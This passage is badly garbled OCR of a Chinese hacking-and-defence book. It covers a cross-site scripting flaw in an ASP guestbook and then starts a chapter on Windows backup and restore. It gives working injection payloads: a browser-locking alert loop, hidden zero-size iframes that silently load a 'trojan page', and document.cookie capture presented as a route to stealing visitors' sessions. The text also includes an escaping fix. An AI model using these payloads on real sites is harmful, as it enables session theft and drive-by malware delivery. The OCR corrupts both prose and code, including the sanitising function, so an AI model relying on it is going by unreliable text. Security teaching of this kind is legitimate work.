<td width="10%" height="14" align="center" bgcolor="#FFFFFF"> 
<font Golor=s"#000000"3 电 称 ; X7font> 
</tad> 
<td width="24%" heignhnt="14"> 
<tont GOLOPE"000000" >So=rs ("name SS></ font> 
font eolora" "red ">< erg("aex") S></font> 
</td> 
<td width="10%" height="14" align="center" bgcolor="#FFFFFF"> 
<font colora"#000000" 邮 御 # <7yfont> 
</tad> 
<td width="20%" heignt="14"> 
«font COLoOrs"#000000™"> 
<a href=mailto:<%=rs ("email")%>><img border=0 src=img/mail.gif> 
< /ont> 
< Ey 
<td width="25%" heignhnt="14" bgcolor="#ffffff"> 
<p align="right"><font color="#000000"> 
<%$%=rs ("time")%> 
</font> 
</td> 
RR 
<tr> 
<td width="12%" height="16" align="center" bgcolor="#FFFFFF"> 


S27 








= > 
全- 攻防 从 入 门 到 精通 
全 人 人 他 


<font colLor="#000000"> 留 言 ，</font> 
x/ to> 
</center> 
<td width="88%" height="1" colspan="2" rowspan="2"> 
<p align="left"><font color="#000000"> 
< 外 =rs("body") %> 
祥生 加 而 七 六 
*/ ta> 
和 


半 河 [ 





<center> 
<tr> 
<td width="12%" height="1" align="]left" bgcolor="#FFFFFF"></td> 
< 
</table> 


以 上 代码 中 加 粗 的 那 两 句 直接 从 数据 库 中 读 取 字符 串 并 放 在 
HTML 代码 中 。 在 这 个 过 程 中 ， 代 码 没 有 对 读 取 的 字符 串 进 行 任何 处 
理 。 如 果 在 数据 库 里 的 字符 串 是 HTML 代码 ， 毫 无 疑问 ， 留 言 内 容 会 


按照 HTML 的 语法 解析 显示 ; 再 则 ， 如 果 是 JavaScript， 则 照样 会 作为 
JavaScript 去 执行 。 








接 下 来 ， 攻 击 者 加 开 始 想 允 法 将 恶意 代码 插入 到 数据 库 中 去 ， 让 页 面 被 访问 时 执行 代 

人 码 。 其 实 ， 插 入 数据 库 的 方法 很 镜 单 ， 发 布 留言 时 留言 的 内 容 会 被 插入 到 数据 库 中 。 蛙 击 

“及 表 留 言 ” 链 接 ， 进 入 “ 签 写 留言 ”页 面 。 这 个 页 面 中 有 儿 处 需要 输入 文本 ， 但 用 户 通明 
只 需要 在 该 页 面 中 输入 昵称 和 留言 内 容 即 可 。 具 体 过 程 皮 光 如 下 。 

















STEP01: 插入 HTML 代码 STEP02: 访问 index.asp 主页 面 
名 a 四 |http://127.0.0.1/ 迷 你 留言 本 /index.asf - 1 .一 一 一 一 一 Ee on 外 jhtp /1/127.0.0.1/ 迷 你 留言 本 /index.asp - 一 一 人 a 
宽 炉 ”图 区 起 网 直 大 全 加 Links 加 Window 旺 了 居 ”国史 可 大 人 目 PR ” 国 吾 ”民间 ” 几 吉 5 手机 的 游戏 ” 内 豆 录 全 系 宽 必 到 ”图 对 由 RM 全 咎 Lnks 下 wndow 点 扩 尽 ”加 2 全 自 央 至 ” 国 吾 # ” 属 生 因 ” 国 直 手机 因 刘 允 ” 内 于 池 人 家 


| 








l ) 了 2 7 3 - 1 
5: 你 迁 鲫 言 而 | 
’@’ “#" 签 写 留 言 *” ' 
两 昵称 ，|<a href=…“>ssnC/ay ; a 2014-2-24 16:0: 
VY 全 4:33; 
性 别 : 1 文士 国 | 
lo 入 oo o@@o98 
0 时 0 灸 o 国 o 癌 o 寺 和 2014-2-24 11:3: 
请 选择 表情 ; © 出 © 各 全 浊 0 中 Oo 尊 : : aa: s 加 4:16: 


0O 罚 0 加 09 Oo 畴 oa 
eA| 122719695 





如 QQ、MSN 











邮箱 : Einehuaye@! 63. com 


<a href="">xinghauye c/a)| 
请 详细 和 





2014-2-24 10: 人 4 
9:20: 








2014-2-24 10:1; 
3:36; 























wa FF 4 四 司 
熏 30X 季 评 悦 洲 5 生 医生 县 下 玛 外 启 中 区 100% 司 济 训 加 E 生 县 下 载 六 向 中 加 100% 


输入 一 个 简单 ”图 单 击 “ 提 交 ” 按 钮 ， 在 。 “ssn” 和 “xinghauye” 都 显示 为 超 链接 ， 说 明 写 
的 HTML 超 链接 标 ”其 中 输入 的 数据 就 被 插入 到 进去 的 HTML 代 码 从 数据 库 中 读 出 后 被 解析 执行 了 ， 
签 “<a> O 数据 库 里 。 也 就 说 明 该 页 面 有 漏洞 了 。 
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STEP03: 向 数据 库 插 入 JavaScript 






时- 了 人 _ 3 
仿造 留言 徊 


# 签 马 留言 "+ 
昵称 ， | 读 乱 的 思 络 
性 别 ，| 女 士 属 


进入 “ 签 写 留言 ”页 面 ， 在 其 中 输入 “<script> 
alert(' 哈 哈 !4 测 试 漏洞 唆 .…. 洲 </script>”。 由 于 昵称 

0 留言 这 两 个 选项 里 都 存在 漏洞 ， 因 此 JavaScript 
代码 可 放 在 其 中 任意 一 项 中 。 











0 名 0 各 o 曾 0 区 0 生 


CO 辐 Oo 踢 O8 0 图 0 如 
人 1227196 5 






如 GQ、 


单 击 “提交 ”按钮 。 





STEP04: 查看 提示 信息 


局 Internet Explorer 


再 次 访问 index.asp 页 面 ， 跟 预料 的 一 样 ， 弹 出 了 
“Internet Explorer” 对 话 框 ， 提 示 相 应 的 测试 信 


CNO 








1 ) 在 “ 签 写 留言 ”页 面 中 输入 的 “<script>alert( 哈 哈 !111! 测试 漏洞 唉 0; 
</script>” 代 码 ， 它 的 功能 是 弹出 一 个 对 话 框 ,显示 “哈哈 111! 测试 漏洞 唆 .……” 
字符 中。 


2 ) 如 果 能 弹出 “Internet Explore” 对 话 框 ， 则 说 明 肢 本 代码 被 执行 了 。 
来 ， 那 些 “ 高 手 ” 也 只 是 通过 这 个 小 小 的 手段 做 到 的 ， 并 不 是 控制 了 服务 器 
修改 了 文件 。 











这 样 的 漏洞 普 志 存在， 并 不 一 定 是 留言 本 才 有 ， 在 网 页 中 有 数据 输入 的 地 方丈 有 
可 能 存在 器 站 脚本 漏洞 ,检测 的 方法 跟前 面 介绍 的 一 样 ,在 输入 数据 的 地 方 输入 HTML 
或 脚本 代码 ， 全 看 在 显示 数据 时 它们 能 人 耕 锐 解析 执行 。 如 末 可 以 ， 则 说 明 这 个 程序 有 
源 洞 。 








10.4.2 ” 跨 站 漏洞 的 利用 


攻击 者 可 以 利用 跨 站 脚本 漏洞 得 到 浏览 该 网 页 用 户 的 Cookie， 使 其 在 不 知 不 觉 中 访问 
木马 网 页 ， 并 且 可 以 让 网 页 无 法 正常 访问 。 











1. 死 循 环 
在 网 页 中 插入 死 循环 语句 ， 这 是 一 种 低劣 的 恶意 攻击 手法 。 写 一 段 条 件 永远 为 真 





的 循环 语句 ， 让 页 面 执 行 到 这 段 代码 时 就 一 直 执 行 这 段 代 码 而 不 能 继续 显示 后 面 的 内 
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黑客 去 


小 [ 一 上 一 攻防 从 入 门 到 精通 


容 ， 从 而 使 网 页 不 能 正常 地 显示 ， 陶 入 死 循环 状态 。 更 有 甚 者， 在 死 循 环 语句 中 加 入 弹出 
对 话 框 的 代码 ， 从 而 使 浏览 者 的 浏览 费 不 堡 地 弹出 对 话 框 ， 始 终 无 法 天 团 ， 必 须 结 束 浏 











哆 器 进程 才 行 。 
有 具体 过 程 曝光 如 下 。 
STEP01: 访问 “index.asp” 主 页 STEP02: 进入 “发 表 留 言 ”页 面 


















































单 击 “发 表 留言 ”链接 。 在 留言 内 容 中 写 入 “<script> 国 单 击 “ 提 
while(true)alert(' 鸣 ~~~ 您 的 死期 ” 交 ” 按 钮 。 
到 了 5 a so Te/scripts” fs 


STEP03: 再 次 访问 index.asp 页 面 STEP04: 再 次 弹出 提示 对 话 框 


DO Internet Explorer | DO Internet Explorer 
p p 


人 、 鸣 “ 您 的 死期 到 了 。。 。 


八 鸣 ~~ 您 的 死期 到 了 。。。 


确定 





2. 隐藏 访问 

隐藏 访问 指使 用 户 在 访问 一 个 网 页 时 不 知 不 觉 之 中 访问 另外 一 个 网 页 。 这 样 做 ， 可 以 
用 来 增加 其 他 网 站 的 访问 量 ， 也 可 以 用 来 放置 网 页 木马 进行 网 络 “ 钓 鱼 ”。 

攻击 者 可 以 在 有 路 站 漏洞 的 页 面 中 插入 代码 ， 让 所 有 访问 这 个 页 面 的 用 户 打 开 这 
个 页 面 的 同时 隐藏 访 问 攻 击 者 的 网 站 ， 从 而 帮 攻 击 者 增加 访问 量 。 网 上 有 路 站 漏洞 的 
页 面 也 不 少 ， 只 要 攻击 者 多 找 几 个 有 漏洞 的 网 站 把 代码 插 进 去 ， 网 站 访问 量 惑 非常 可 
观 了 。 
这 样 的 危害 还 不 算 大 ， 仅 仅 是 给 攻击 者 的 网 站 增加 了 些 访问 量 而 已 ， 对 于 漏洞 页 
面 来 说 ， 最 多 也 只 是 因为 多 加 载 一 个 页 面 而 稍微 影 啊 速 度 。 如 果 攻 击 者 让 用 户 隐 藏 访 
问 的 页 面 是 一 个 木马 网 页 ， 那 问题 就 严重 了 。 在 访问 时 ， 用 户 的 计算 机 在 不 知 不 觉 中 
下 载 并 安装 了 一 个 病毒 或 者 木马 程序 ,这 样 计算 机 的 控制 权 完 全 竺 握 在 攻击 者 的 手 里 。 

往 一 个 知名 网 站 的 页 面 里 插 木 马 网 页 让 人 不 知 不 觉 地 中 招 ， 比 在 QQ 和 群 里 发 消 居 骗 人 
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扩 击 木马 的 效率 要 局 很 多 。 让 用 户 访 问 页 面 的 方法 很 多 ， 如 插入 如 下 代码 可 以 直接 从 当前 
网 页 跳 转 到 目标 负面 : 





«SOOTTOt> 
window.location.href=" 上 目标 页 面 "， 
< Oript> 








这 样 直接 跳 转 过 去 的 隐蔽 性 不 高 ， 明 眼 人 一 看 就 知道 有 问题 。 所 以 ， 黑 客 更 多 选择 用 
隐藏 访问 的 方法 来 达到 日 的 。 实 现 隐藏 访问 的 方法 有 两 种 。 

1) 让 页 面 弹出 一 个 高 度 和 宽度 都 为 0, 而 且 坐 标 在 屏幕 范围 之 外 的 新 页 面 来 打开 网 页 。 
其 代码 如 下 : 











< Suritt> 
window.open (' 目 标 页 面 '/， `',， ‘top=10000, left=10000, neight=0, width=0’)，; 
</SCrEipt> 








用 这 种 方法 在 弹出 一 个 新 页 面 后 ， 虽 然 用 户 看 不 到 ， 但 古 在 任务 栏 中 会 出 现 这 个 
页 面 的 标题 按钮 。 不 过 攻击 者 可 以 加 入 代码 让 木马 网 页 目 动 关闭 ， 这 样 留 意 任 务 栏 的 
人 不 多 。 而 且 木 号 网 页 的 标题 一 内 而 过 ， 刚 开 号 上 就 被 天 闭 了 ， 也 不 会 有 太 多 人 去 在 

2) 在 页 面 中 插入 一 个 高 度 和 宽度 都 为 0 的 框架 。 其 内 容 是 攻击 者 想 机 用户 访问 的 网 页 
地 址 ， 既 不 会 弹出 一 个 新 窗口 ， 页 面 看 起 来 也 与 没有 插入 代码 一 样 ， 隐 蔽 性 十 分 局 。 插 入 
框 染 的 代 但 为 : 


<iframe src=" 上 月 标 网 页 "> </iframe> 














具体 过 程 曝光 如 下 。 
STEP01: 用 一 幅 图 片 来 测试 代码 效果 STEP02: 访问 index.asp 页 面 














福 陀 拒 2Totkr , 邮 | 2014-2-24 于 
7:16:36; 


过 ia 辆 丰 





2014-2-2417:1: 
1:35; 


l; 
7:03:07: 

















5 
寺 90% 洒 评 





在 “ 签 写 留 言 ”页 面 中 写 入 单 击 “ 提 ”将 会 看 到 网 页 里 成 功 插入 了 一 个 框架 ， 并 把 图 片 也 
“<iframe src="http:// www.baidu.， ” 交 ” 按 钮 。 显示 了 出 来 6 


com/img/baidu_logo.gif"></iframe> 。 
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攻防 从 入 门 到 精通 


“<iframe src="http:/www.baidu.com/img/baidu_logo.gif"></iframe>” 


© 的 含义 


提示 这 段 代码 的 作用 是 在 网 页 中 插入 一 个 框架 ， 以 显示 百度 网 站 的 Logo.gif 
图 片 。 


























STEP03: 设置 框架 的 高 度 和 宽度 为 0 STEP04: 再 访问 index.asp 页 面 
| 360 安 全 浏 党 冉 6.2 文件 下 看 收 藏 工具 和 二 | 徊 一 口 Xx | 360 安 全 浏览 器 6.2 文 纤 下 看 收藏 工具 帮助 管 X 
外 他 | 会 四 127.0.0.1 # v > 国 - Q © 她 | 会 四 12 1 国 . Q 
必 琶 ”图 人 政 必 凤 址 大全 回 Unks 回 Windo 回 自 3 ” 国 BB# 条 手机 6 匀 尖 过 ” 内 本 录 各 家 六 收 到 ” 图 人 家 只 网址 大 全 回 Links 回 Window 路 了 居 ” 国 机 大 全 自 R ” 国 B# ”属国 百子 机 3 SS 
| 
, pe = 
WY 盆 沽 包扎 三 © 翁 洗 留 吝 4 
澡 名 
‘@; ‘9; 









; 留言 pasdfasdrsda 














在 “ 签 写 留言 ”页 面 中 写 入 单 击 “ 提 ”为 了 和 前 面 的 留言 进行 区 别 ， 这 次 的 昵称 改 为 


“<iframe src="http://www.baidu. 交 ” 按 钮 。 “框架 Test2”。 可 发 现 此 时 框架 已 经 被 彻底 地 
com/img/baidu_logo. gif" width= 隐藏 起 来 了 ， 在 页 面 中 已 经 看 不 到 了 。 


"0" height="0"></iframe>” 。 








有 些 人 会 说 ， 也 有 可 能 是 因为 代码 没有 被 执行 ， 所 以 才 会 看 不 到 。 下 面 不 妨 通 过 一 个 实 
验 来 验证 一 下 。 先 来 做 一 个 test.html 文件 ， 将 其 放 在 迷你 留言 本 网 站 的 根 目录 下 作为 木马 网 
页 ， 其 功能 只 是 弹出 一 个 对 话 框 说 明 已 经 隐藏 访问 木马 页 面 。 其 代 但 如 下 : 


























<html> 
<head></head> 
<body> 
<script>alert(' 小 心 噢 ! 您 现在 正在 访问 木马 页 面 ! ')</script> 
</bodyv> 
</html> 





再 来 发 布 一 个 跨 站 留言 ， 让 用 户 隐藏 访问 testhtml， 留 言 部 分 的 代码 如 下 : 


ie eros="ittory/ locoaLliost/ 人 让 仆 久 证 丰 /test, html™ widths"0 helones"0" 
</iframe> 








在 实际 利用 漏洞 时 ， 攻 击 者 会 把 木马 页 面 放 在 自己 的 网 站 空间 中 。 上 述 代码 使 用 完整 
的 路 径 来 表示 木 瑟 页 面 的 地 址 ， 为 了 模拟 得 真实 一 些 ， 这 里 使 用 test.html 的 完整 路 径 
“http://localhost/ 迷 你 留言 本 /test.html”。 以 示 区 别 , 后面 都 用 localhost 来 表示 攻击 者 的 网 站 ， 
用 127.0.0.1 表示 漏洞 网 站 。 具 体 过 程 曝 光 如 下 。 
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“ 签 写 留言 ”页 面 SITERPO2: 本 留言 Ind 
SEOIS 打开 言 ” 页 访问 留言 主页 index.asp 
一 | 360 安 文件 下 看 收 基 工本 =- 患 360 安 文件 吾 看 站 太 工 a 
Er. 全 会 | 四 127.0.0.1 5 vi» 国 - Q 人 驴 | 会 田 127.0.0.1 $v >|| 国 . Q 
区 收 塌 ”图 和 区 本 网 引 太 全 口 Links 器 Window 器 六 尽 ” 国 于 权 大 全 犁 月 ” 园 B3 ”明基 本 避 直通 于 机 有 网关 交 ” 崩 登 录 包 家 名 收 京 ” 国名 仅 四 网 让 大 全 问 Unks 器 Window 中 六 二 ”加 28 全 白骨 RR ” 国 B ”民国 下 时机 的 六 涛 ” 硼 要 妇 合 京 
,2 族 7 多 FE 
加 Le : 
回 
‘@; “* 签 马 留言 "+ 
内 昵称 ， | 框架 Test3 
性 别 ，| 女士 部 


o 电 09 09 oB 0o9 
请 选择 表 情 ，| = o0 0 是 o@ 0 包 
O 急 0 这 0 电 0Oe 引 oO 党 
和 图 Oo 吕 O09 OO 名 OO 
0 12345678 








局 。 COR 
rc="http://localhost/ A| 
: 于 你 半球 est_ nl- 
ight="0" ></ iframe> = 
出 证 下 小 ] Da 民 


























写 入 “<iframe src= "http: 单 击 “ 提 交 ” 页 面 中 将 会 弹出 预料 中 的 “ Internet Explorer 
//localhost/ 迷 你 留言 本 /test. 5 对 话 框 。 
html" width="0" helght= 0 > 
</iframe> 。 

以 上 操作 证 明 页 面 中 代码 被 成 功 执行 了 ， 用 户 已 经 访问 了 木马 页 面 。 这 个 对 话 框 是 专 
门 为 了 证 明 漏 洞 存在 而 加 上 去 的 ， 如 果 没 有 加 这 名 代码 ， 网 页 浏览 者 根本 不 知道 目 己 已 经 
访问 了 木马 页 面 ， 在 不 知 不 觉 中 吏 把 木马 下 载 到 目 己 的 计算 机 上 运行 了 ， 这 无 疑 是 一 件 非 
弟 可 怕 的 事情 。 

3. 获取 浏览 者 cookie 信息 

为 了 节省 服务 器 的 资源 ， 论 坛 和 留言 本 通常 都 把 用 户 的 登录 信息 保存 在 用 户 计 算 机 的 
Cookie 中 , 通过 一 些 特殊 的 代码 从 用 户 的 Cookie 中 提取 这 个 文件 ， 再 配合 隐藏 访问 的 方法 
将 其 发 送 给 攻击 者 。 具 体 过 程 曝光 如 下 。 











STEP01: 进入 “ 签 写 留言 ”页 面 STEP02: 再 次 访问 留言 主页 index.asp 
全 ee @ nrtp-W127.0.0.L/ 过 












高 SE ”国史 EX 人 2 BUnks DWindow 


优选 留言 千 





宣 有 ET 
[A 辊 称 ，| 天 发 玉 
性 别 ， | 先生 


0 间 0 区 0 及 0 息 0 全 
0 0 革 6 各 o 因 0 加 
0O 0 杰 0O 六 OO 中 OO 千 
OO 图 0 畦 0 Oo 时 08 


REDE [22719605 | sqoa. Msn 


请 造反 表情 ; 


© Internet Explorer ba 








人 rtime=0; ltime=1274691194390; cnzrr_eid=1023467-1274662640-; ASPSESSIONIDSSTQTDDD=CUFPHJDCLLEKTENMOKEBGEEIT 


[确定 | 

















写 入 “<Sscript> alert 02| 单 击 “ 提 ”弹出 “Internet Explorer” 对 话 框 ， 在 其 中 
(document.cookie); </script>”。 交 ” 按 钮 。 提示 浏览 者 在 本 站 的 cookie 内 容 。 

从 上 述 过 程 中 可 以 看 出 路 站 漏洞 的 危害 很 大 ， 攻 击 者 可 以 通过 一 些 方法 取得 浏览 者 的 
Cookie， 从 而 得 到 所 需 的 敏感 信息 。 
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二 = | 

取 = > 
用 攻防 从 入 门 到 精通 
小 全 人 人 他 





10.4.3 ”对 路 站 漏洞 的 预防 指 施 


dvHTMLEncode() 函 数 是 从 ubbcode 中 提取 的 用 于 处 理 特殊 字符 串 的 函数 。 它 能 把 一 些 
特殊 《如 尖 插 写 之 类 ) 的 字符 符 换 成 HTML 特殊 字符 集中 的 字符 。 

HTML 语言 是 标签 语言 ， 所 有 的 代码 都 是 用 标签 括 起 才 有 用 ， 而 所 有 标签 用 尖 括 号 括 
起 来 。 奉 尖 括 号 不 能 发 挥 原 来 的 作用 ， 攻 击 者 插入 的 代码 便 失 去 作用 。 

dvHTMLEncode() 函 数 的 完整 代码 如 下 : 


funcetion dvHTMLEncGodeé (byval TStrindg) 











i, 6n0L1(fStTINng) or trim(ftSoteiIng)="™ then 
dvHTMLENnCcode="" 


exit function 


end if 
fString = replace (fString, ">", "&gt;") 
foStringdg = replace lftStrings <"y "&lts") 
fostring = Replacel(lftSstring», .CHR(32)» "nbep;") 
fString = Replace(fString, CHR(9), "&nbsp;") 
fString = Replace (fString, CHR(34), "&quot;") 
fSstring = Replace (fString, CHR(39), "&#39;") 
fString = Replace(fString, CHR(13), "") 
fString = Replace(fString, CHR(10) & CHR(10), "</P><P> ") 
fsString = Replace (foStrings CHR(10)s "<BR> ™) 


dvHTMLEncode = fString 


end function 


这 个 函数 的 语法 很 们 单 ， 束 是 使 用 replace0 函 数 符 换 字符 串 中 的 一 些 特殊 字符 ， 如 果 
需要 过 滤 其 他 特殊 字符 ， 可 以 试 着 上 自己 添加 上 去 。 用 dvHTMLEncode0 函 数 把 所 有 输入 及 
输出 的 字符 串 都 过 滤 处 理 一 过 ， 即 可 杜绝 大 部 分 路 站 漏洞 的 出 现 。 如 简单 留言 本 的 漏洞 是 
因为 name 中 的 body 没有 经 过 过 小 而 直接 输出 到 页 面 形 成 的 ， 代 但 如 下 : 


<%$=rs ("name") %> 











<%$=rs ("body")%$> 


如 果 把 代码 修改 成 下 面 这 样 ， 束 可 以 避免 跨 站 汤 洞 的 出 现 了 。 
<%$=dvHTMLEnNncode( rs("name") )%$> 


去 所 三 dvHIMLEncode( rs("body") )})%> 


用 dvHTMLEncode() 溯 数 过 小 后 输出 ， 问 题 即 得 到 解决 。 也 可 以 在 用 户 提 交 时 过 小 ， 然 后 
写 到 数据 库 中 ， 在 其 他 地 方 也 可 以 用 这 个 函数 过 滤 ， 只 要 过 滤 得 彻底 ， 就 不 用 那么 担心 有 路 站 
漏洞 出 现 。 当 然 ， 用 户 也 不 能 被 动 地 期 望 网 站 的 管理 员 去 修补 漏洞 。 万 一 网 被 挂 了 木马 ， 而 用 
户 访问 了 这 个 网 页 中 的 森马， 最 终 吃 亏 的 还 是 用 户 。 

这 里 建议 用 户 关 闭 正 解析 JavaScript 的 功能 。 有 具体 的 操作 步骤 如 下 。 
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STEP01: 打开 IE 浏览 器 


| WW http://www.hao123.com/?tn=92399452 hao pg 由 Pd 
-四 顺 ”pn ” 安 2(5)7 [IRAO*O-©® 


修复 连接 问题 (OC).. 桌面 版 ”手机 版 
重新 打开 上 次 浏览 会 话 (S) 





弹出 窗口 阻止 程序 (P) 
童 看 下 载 (N) 
管理 加 载 项 (A) 


Ctr|+J 


本 


兼容 性 视图 设置 (B) 
全 屏 (L) 

工具 栏 (T) 
浏 览 莫 柱 (9 


F12 开发 人 员工 具 (D) 
建议 网 站 (G) 


PPLive 

OneNote 链接 笔记 (向 
点 送 至 OneNote(N) 
启动 也 证 看 者 接 放 和 器 
Sun Java 控制 台 
启动 迅雷 看 看 拟 放 器 





Internet 选项 ( 〇 ) 


选择 “工具 ”> “Internet 选 项 ”菜单 命令 。 


STEP03: 安全 设置 
安全 设置 - Internet 区 域 


急 ] 脚本 
时 | Java 小 程序 脚本 


和 | 启用 XSS 师 选 器 
局 荣 用 
页) 启用 
号] 多 计 对 前 贴 板 进 行 编程 访问 
© 禁用 
1 [me | 
* 在 重新 启动 你 的 计算 机 后 生效 


重 置 自 定义 设置 
重 凋 为 R): | 中 -高 -与 认 值 ) Y 





另外 ， 尽 量 不 要 访 


STEPO2: 








网 站 攻防 


自 定义 安全 级 别 


Internet 选项 
选择 一 个 区 域 以 查看 或 更 由 安 全 人 襄 置 。 


@ 所 V 


Tnternet 到 信任 于 是 


ee ane 


Internet 
@ sn 


该 区 域 的 安全 级 别 红 ) 
该 让 中 到 | 高 


ee 


图 自用 保护 模式 芝 求 本 新 咎 自 定义 级 别 扣 ). .|| 默认 扫 别 上 ) | 


Internet Explorer) 
将 所 有 疏 域 重 置 为 默认 级 别 区 ) 


re 
| 站 点 6) 


与 要 刁 | [本 %- 


选择 “安全 ”选项 卡 ， 选 中 “Internet” 图 标 ， 单 


击 “ 自 定义 级 别 ” 按 钮 。 


贺 把 “活动 脚本 ”设置 成 “禁用 ”状态 。 


国 单 击 “ 确 定 ” 按 钮 。 


问安 全 性 不 高 的 网 站 ， 上 网 时 打开 杀毒 软件 的 脚本 监控 功能 ， 这 样 





可 以 降低 被 恶意 攻击 者 利用 路 站 脚本 漏洞 攻击 的 可 能 性 。 
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系统 和 数据 的 备份 与 恢复 


当 用 户 日 常 浏览 网 页 、 下 载 工 具 时 ， 有 时 会 遇 到 一 些 病毒 、 木 马夹 带 在 其 
中 的 情况 ， 对 系统 造成 伤害 而 无 法 正常 使 用 。 如 果 提 前 对 系统 和 数据 做 好 备份 ， 
在 这 时 就 可 以 及 时 地 进行 恢复 操作 ， 从 而 避免 不 必要 的 损失 。 


O 备份 与 还 原 操 作 系统 
O 备份 与 还 原 用 户 数据 
O 使 用 恢复 工具 恢复 数据 





-<17 章 





系统 和 数据 的 备份 与 恢复 








备份 与 还 原 操作 系统 
17.1.1 使 用 还 原点 备份 与 还 原 系统 


Windows 系统 内 置 了 一 个 系统 备份 和 还 原 模块 ， 这 个 模块 就 叫做 还 原点 。 当 系统 出 现 
问题 时 ， 可 先 通 过 还 原点 符 试 修复 系统 。 

1. 创建 还 原点 

还 原 扩 在 Windows 系统 中 是 为 保护 系统 而 存在 的 。 由 于 每 个 被 创建 的 还 原点 中 都 包 合 
了 该 系统 的 系统 设置 和 文件 数据 ， 所 以 用 户 完 全 可 以 使 用 还 原点 来 进行 备份 和 还 原 操 作 系 
统 的 操作 。 现 在 就 详细 介绍 创建 还 原 扣 的 其 体操 作 步 又 与 方法 。 


STEP01: 右 击 桌面 上 的 “计算 机 ”图 标 STEP02: 打开 的 “系统 ”窗口 














打开 (O) 
设备 管理 莫 
[a 管理 (G6) 


文件 (Fi) ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 


“0 查看 有 关 计算 机 的 基本 信和 
员 设备 管理 器 Windows 版 本 
妓 远程 设置 Windows 7 旗舰 版 
太 系统 保 坊 版 权 所 有 加 2009 Microsoft 


断 开 网 络 张 动 右 (C)... 


创建 快捷 方式 (9) 
删除 (D) 


Service Pack 1 





在 弹出 的 快捷 菜单 中 单 击 “ 属 性 ”命令 。 单 击 左 侧 的 “高 级 系统 设置 ”链接 。 
STEP03: 打开 “系统 属性 "对话 框 STEP04: 创建 还 原点 


计算 机 名 | 硬件 [证 高 级 -| | 系统 保护 
信用 系 综 保 近 示 执 清 下 村 要 的 系统 更 次 ， 还 原 以 前 上 











“| 申 “re | < "| 1] 
4 机 还 原 到 上 一 个 还 原点 ， 。 [ 东 统 还 原 a 





和 鱼 , 本 地 磁盘 |C:】 (系统 ) 





立刻 为 启用 系 特 保 护 的 驱动 器 创建 还 原点 。 


切换 至 “系统 保 单 击 “创建 ”按钮 。 图 输入 还 原点 描述 。 单 击 “ 创 建 ” 按 钮 。 
护 ” 选 项 卡 。 
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EA 


pa 


Fy > 
全- 攻防 从 入 门 到 精通 
全 人 人 他 


STEP05: 正在 创建 还 原点 STEP06: 成 功 创建 还 原点 





正在 创建 迁 原 点 .… . 





查看 创建 进度 。 查看 提示 信息 并 单 击 “关闭 ”按钮 。 
© 在 Windows 系统 中 ,还 原点 虽然 默认 只 备份 系统 安装 所 在 盘 的 数据 ,但 用 
# 户 也 可 通过 设置 来 备份 非 系 统 盘 中 的 数据 。 只 是 由 于 非 系统 盘 中 的 数据 繁多 ， 
担 示 使 用 还 原点 备份 时 要 保证 计算 机 有 足够 的 磁盘 空间 。 
2. 使 用 还 原点 
成 功 创建 还 原点 后 , 系统 遇 到 问题 时 就 可 通过 还 原点 来 还 原 系统 从 而 对 系统 进行 修复 。 
现在 就 详细 介绍 还 原点 的 具体 使 用 方法 和 步骤 。 
STEP01: 打开 “系统 属性 ”对话 框 STEP02: 还 原 系统 文件 和 设置 





还 原 系统 文件 和 设置 


系统 还 原 可 以 帮助 解决 使 计算 机 运行 继 慢 或 停止 响应 的 问题 。 








保护 设置 - 
可 用 驱动 器 
龟 本 地 磁盘 人:) (系统 ) 
-本 地 磁盘 外 :】 





切换 至 “系统 保 国 单 击 “系统 还 原 ” 。 单 击 “ 下 一 步 ”按钮 。 














护 ” 选 项 卡 。 按钮 。 
STEP03: 根据 日 期 、 时 间 选 取 还 原点 STEP04: 确认 还 原点 信息 
才 系统 还 原 a 
将 计算 机 还 原 到 所 选 事件 之 前 的 状态 3 确认 还 原点 
; 你 的 计算 机 将 被 还 原 到 下 面 “描述 ”字段 中 的 事件 之 前 所 处 的 状 
时 间 : 2014/117 10:27:12 (GHT+8:00) 
如 何 选择 还 原点 ? 描述 : 手动 : 系统 








当前 时 区 : GMT+8:00 驱动 器 : 。 | 本 地 磁盘 CC:) (系统 ) 


日 期 和 时 间 “ 
2014/1/7 10:46:52 


2014/1/7 10:27:12 











如 时 您 量 关 更 次 了 Windows 密码 ， 则 建议 您 创建 密码 重 置 盘 。 创 建 


NY 














《上 - 步 @] 压 = 步 吕 | 取消 ] | +- 步 |[ _ SF 成 ] I 


站 
ee 一 py = CI 


选中 一 个 还 原点 。 园 单 击 “ 下 一 步 ”按钮 。 单 击 “完成 ”按钮 。 





系统 和 数据 的 备份 与 恢复 














STEP05: 查看 提示 信息 STEP06: 准备 还 原 系统 
确认 还 原点 = 
人 和 计算 机 构 补 还原 下面 “描述 "字段 中 的 事件 之 前 区 的 计算 机 名 | 硬件 | 高 级 | 系统 保护 
ER (GHT+8:00) 古 训 以 信 轩 系统 保 近来 过 消 下 委 要 的 系统 更 改 ， 还 原 以 前 版 
驱动 器 : i: 
系统 还 原 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
过 将 计算 机 还 原 到 上 一 个 还 原点 ， 
重启 动 后 ,系统 还 原 丰 能 中 断 。 您 名 望 继续 吗 ? 和 2 系统 还 原 8). 
除非 系统 还 原 已 完成 ， 否 则 无 法 符 其 濑 消 。 如 果 在 安全 模式 下 或 从 “系统 恢复 选项 ” 菜 ER 
羊 运行 系统 还 原 , 则 无 法 种 湛 。 | 统 还 居 
入 
本 地 磁盘 器 :) 
-3 本 地 磁盘 三 :) 
单 击 “是 ”按钮 。 计算 机 正在 准备 还 原 系 统 。 
STEP07: 还 原 Windows 文件 和 设置 STEP08: 系统 还 原 完成 


4 完成 ] 4 ] 日 
系统 还 原 已 成 丙 守 已 人 阳 为 2012/10/15 


~ 请 稍 候 正在 还 原 Wind6WSEXf 牛 和 设置 15:52:45o 


系统 还 原 完成 





沙 . WINndOWS 7 该 舰 版 


重新 启动 计算 机 。 查看 提示 信息 并 单 击 “关闭 ”按钮 。 





17.1.2 使 用 GHOST 备份 与 还 原 系统 


GHOST 全 名 Norton GHOST (Symantec General Hardware _ Oriented System 
Transfer， 详 顿 克 隆 精 灵 )， 是 美国 赛 门 铁 克 公司 开发 的 一 亚 人 硬盘 备份 还 原 工 具 。 
GHOST 可 以 实现 FAT16、FAT32、NTFS、0OS2 等 多 种 硬盘 分 区 格式 的 分 区 及 硬盘 的 
备份 还 原 。 在 这 些 功 能 中 ， 数 据 备份 和 备份 恢复 的 使 用 频率 特 高 ， 也 是 用 户 非 常 热 
ee ` 原 工具 。 

.认识 GHOST 操作 界面 
